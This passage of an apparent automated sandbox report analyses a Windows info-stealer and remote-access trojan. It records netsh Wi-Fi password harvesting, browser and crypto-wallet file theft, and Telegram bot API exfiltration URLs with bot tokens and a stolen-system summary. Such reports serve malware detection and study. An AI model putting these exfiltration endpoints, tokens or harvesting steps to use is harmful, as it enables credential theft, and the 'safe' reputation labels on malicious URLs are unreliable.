                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597235Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597110Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596985Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596860Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596735Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596610Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596480Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 100000Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 99875Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 99765Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 99656Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 99547Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 99432Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 99327Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 99219Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 99094Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 98984Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 98875Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 98754Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 98640Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594969Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594860Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594750Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594641Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594516Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594391Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594281Jump to behavior
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: tasks.office.comVMware20,11696501413o
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: dev.azure.comVMware20,11696501413j
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833356151.0000000000853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAPP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDrive
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: outlook.office.comVMware20,11696501413s
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                              Source: vYz1Z2heor.exeBinary or memory string: vmware
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: global block list test formVMware20,11696501413
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                              Source: vYz1Z2heor.exeBinary or memory string: VMwareVBox
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: discord.comVMware20,11696501413f
                              Source: tmpD645.tmp.dat.0.drBinary or memory string: AMC password management pageVMware20,11696501413
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_05180B20 LdrInitializeThunk,0_2_05180B20
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssidJump to behavior

                              Language, Device and Operating System Detection

                              barindex
                              Yara detected Telegram Recon
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeQueries volume information: C:\Users\user\Desktop\vYz1Z2heor.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Uses netsh to modify the Windows network and firewall settings
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                              Source: vYz1Z2heor.exe, 00000000.00000002.3836768735.00000000049F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected StormKitty Stealer
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Yara detected Telegram RAT
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Yara detected WorldWind Stealer
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Found many strings related to Crypto-Wallets (likely being stolen)
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets
                              Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                              Tries to harvest and steal WLAN passwords
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Yara detected StormKitty Stealer
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Yara detected Telegram RAT
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Yara detected WorldWind Stealer
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                              Windows Management Instrumentation                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		11
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		Remote Services1
                              Archive Collected Data                              		2
                              Web Service                              		Exfiltration Over Other Network Medium1
                              Data Encrypted for Impact
                              CredentialsDomainsDefault Accounts2
                              Command and Scripting Interpreter                              		1
                              Scheduled Task/Job                              		11
                              Process Injection                              		111
                              Obfuscated Files or Information                              		1
                              Input Capture                              		124
                              System Information Discovery                              		Remote Desktop Protocol2
                              Data from Local System                              		1
                              Ingress Tool Transfer                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job                              		Logon Script (Windows)1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		Security Account Manager341
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Screen Capture                              		11
                              Encrypted Channel                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                              Masquerading                              		NTDS1
                              Process Discovery                              		Distributed Component Object Model1
                              Input Capture                              		3
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script251
                              Virtualization/Sandbox Evasion                              		LSA Secrets251
                              Virtualization/Sandbox Evasion                              		SSHKeylogging4
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                              Process Injection                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                              System Network Configuration Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1495519 Sample: vYz1Z2heor.exe Startdate: 20/08/2024 Architecture: WINDOWS Score: 100 40 pastebin.com 2->40 42 api.telegram.org 2->42 44 3 other IPs or domains 2->44 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 62 13 other signatures 2->62 8 vYz1Z2heor.exe 15 132 2->8         started        signatures3 58 Connects to a pastebin service (likely for C&C) 40->58 60 Uses the Telegram API (likely for C&C communication) 42->60 process4 dnsIp5 46 api.telegram.org 149.154.167.220, 443, 49703, 49704 TELEGRAMRU United Kingdom 8->46 48 pastebin.com 172.67.19.24, 443, 49709 CLOUDFLARENETUS United States 8->48 50 3 other IPs or domains 8->50 32 C:\Users\user\AppData\...\PALRGUCVEH.docx, ASCII 8->32 dropped 34 C:\Users\user\AppData\...\PALRGUCVEH.docx, ASCII 8->34 dropped 36 C:\Users\user\AppData\...\KLIZUSIQEN.jpg, ASCII 8->36 dropped 38 2 other malicious files 8->38 dropped 64 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->64 66 Found many strings related to Crypto-Wallets (likely being stolen) 8->66 68 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 8->68 70 3 other signatures 8->70 13 cmd.exe 1 8->13         started        16 cmd.exe 1 8->16         started        file6 signatures7 process8 signatures9 72 Uses netsh to modify the Windows network and firewall settings 13->72 74 Tries to harvest and steal WLAN passwords 13->74 18 netsh.exe 2 13->18         started        20 conhost.exe 13->20         started        22 findstr.exe 1 13->22         started        24 chcp.com 1 13->24         started        26 netsh.exe 2 16->26         started        28 conhost.exe 16->28         started        30 chcp.com 1 16->30         started        process10

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              vYz1Z2heor.exe72%VirustotalBrowse
                              vYz1Z2heor.exe87%ReversingLabsByteCode-MSIL.Backdoor.AsyncRat
                              vYz1Z2heor.exe100%Joe Sandbox ML

                              Dropped Files

                              No Antivirus matches

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                              https://www.ecosia.org/newtab/0%URL Reputationsafe
                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                              https://support.mozilla.org0%URL Reputationsafe
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                              https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=52830%Avira URL Cloudsafe
                              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                              https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=57954804690%Avira URL Cloudsafe
                              https://api.telegram.org/bot0%Avira URL Cloudsafe
                              https://api.telegram.org0%Avira URL Cloudsafe
                              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                              https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.130%Avira URL Cloudsafe
                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                              https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=579540%Avira URL Cloudsafe
                              https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:150%Avira URL Cloudsafe
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                              https://api.telegram.orgD0%Avira URL Cloudsafe
                              http://pastebin.comd0%Avira URL Cloudsafe
                              https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...0%Avira URL Cloudsafe
                              https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=52836629560%Avira URL Cloudsafe
                              http://icanhazip.com/0%Avira URL Cloudsafe
                              https://pastebin.com/raw/7B7P0%Avira URL Cloudsafe
                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp0%Avira URL Cloudsafe
                              https://github.com/LimerBoy/StormKitty0%Avira URL Cloudsafe
                              https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-20%205:06:19%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20506013%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201PKE1OBC%0ARAM:%204095MB%0AHWID:%205D1E7ABD56%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True0%Avira URL Cloudsafe
                              https://github.com/LimerBoy/StormKitty0&0%Avira URL Cloudsafe
                              http://api.telegram.orgd0%Avira URL Cloudsafe
                              https://api.telegram.org/file/bot0%Avira URL Cloudsafe
                              http://pastebin.com0%Avira URL Cloudsafe
                              https://pastebin.com0%Avira URL Cloudsafe
                              http://api.telegram.org0%Avira URL Cloudsafe
                              https://pastebin.com/raw/7B75u64B0%Avira URL Cloudsafe
                              https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=57950%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              api.mylnikov.org
                              		172.67.196.114
                              		truefalse
                                		unknown
                                api.telegram.org
                                		149.154.167.220
                                		truetrue
                                  		unknown
                                  pastebin.com
                                  		172.67.19.24
                                  		truetrue
                                    		unknown
                                    icanhazip.com
                                    		104.16.185.241
                                    		truefalse
                                      		unknown
                                      157.184.7.0.in-addr.arpa
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795480469true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://icanhazip.com/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...true
                                        • Avira URL Cloud: safe
                                        		unknown
